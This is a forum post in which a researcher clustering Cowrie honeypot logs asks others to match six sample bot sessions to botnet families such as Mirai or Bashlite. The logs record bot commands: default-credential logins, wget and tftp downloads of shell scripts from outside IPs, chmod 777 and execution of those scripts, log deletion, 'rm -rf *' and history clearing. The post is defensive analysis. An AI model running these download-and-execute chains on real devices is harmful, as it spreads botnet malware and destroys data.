Threat Level: green Handler on Duty: Russell Eubanks

SANS ISC: Need help with classifying botnets via log entries - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Need help with classifying botnets via log entries
Hey there,

i wrote a program which successfully does k-means clustering with cowrie log entries from honeypots to assign attack cycles to one of 6 different clusters so i can statistically analyze what type of bot is used by attackers. My problem is, that I can't find many informations about typical log entries from bots on the internet. Can someone of you assign the following examples of each cluster to a common botnet (e.g. Mirai, Bashlite, etc.)?


#########
CLUSTER 0
#########
14 11 31.14.45.6 37045 2016-10-11T15:15:03+0000 New connection
14 11 31.14.45.6 37045 2016-10-11T15:15:04+0000 login attempt [root/root] succeeded
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Opening TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Warning: state changed and new state returned
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: cat /proc/mounts
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Closing TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Connection lost after 37 seconds


#########
CLUSTER 1
#########
21806 6035 113.23.72.170 60272 2016-10-20T00:45:11+0000 New connection
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 login attempt [root/root] succeeded
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Opening TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Warning: state changed and new state returned
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /proc/mounts
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cd /dev && >.s || cd /var/tmp/ && >.s || cd /...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /dev
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/run
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /home
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cp /bin/echo /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 CMD: /bin/busybox chmod 777 .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 CMD: cat .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Closing TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Connection lost after 8 seconds


#########
CLUSTER 2
#########
94 88 61.222.241.117 47743 2016-10-11T16:02:04+0000 New connection
94 88 61.222.241.117 47743 2016-10-11T16:02:14+0000 login attempt [root/root] succeeded
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Opening TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Warning: state changed and new state returned
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 CMD: sh || bash || shell
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: sh
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: bash
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command not found: shell
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 CMD: echo loldongs || busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 CMD: cd /tmp || cd /var/run || cd /dev/shm || cd /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /tmp
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var/run
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /dev/shm
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /mnt
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: rm -f /var/log /var/run /var/mail /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: busybox wget http://93.158.200.115/...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Closing TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Connection lost after 23 seconds


#########
CLUSTER 3
#########
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 New connection
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 login attempt [root/root] succeeded
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Opening TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Warning: state changed and new state returned
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 CMD: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Command not found: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 CMD: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 Command found: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 CMD: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 Command found: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: mkdir -p /var/... && rm -f /var/.../*; ftpget...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: mkdir -p /var/...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: rm -f /var/.../*
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: ftpget -u ftp 164.132.237.180 /...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: wget -O /var/.../dn.sh http://164.1...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: tftp -g -r dn.sh -l /var/.../dn...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: chmod +x /var/.../dn.sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: sh /var/.../dn.sh &
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Closing TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Connection lost after 7 seconds


#########
CLUSTER 4
#########
4513 4310 46.172.91.20 47029 2016-10-13T04:59:41+0000 New connection
4513 4310 46.172.91.20 47029 2016-10-13T04:59:43+0000 login attempt [root/123456] succeeded
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Opening TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Warning: state changed and new state returned
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 CMD: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Command found: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Reading txtcmd from "txtcmds/bin/mount"
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Closing TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Connection lost after 8 seconds


#########
CLUSTER 5
#########
3531 3363 124.107.59.21 35557 2016-10-12T22:58:26+0000 New connection
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 login attempt [root/root] succeeded
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Opening TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Warning: state changed and new state returned
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 CMD: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 Command found: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: wget http://45.32.194.93/bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Closing TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Connection lost after 66 seconds
Anonymous

Sign Up for Free or Log In to start participating in the conversation!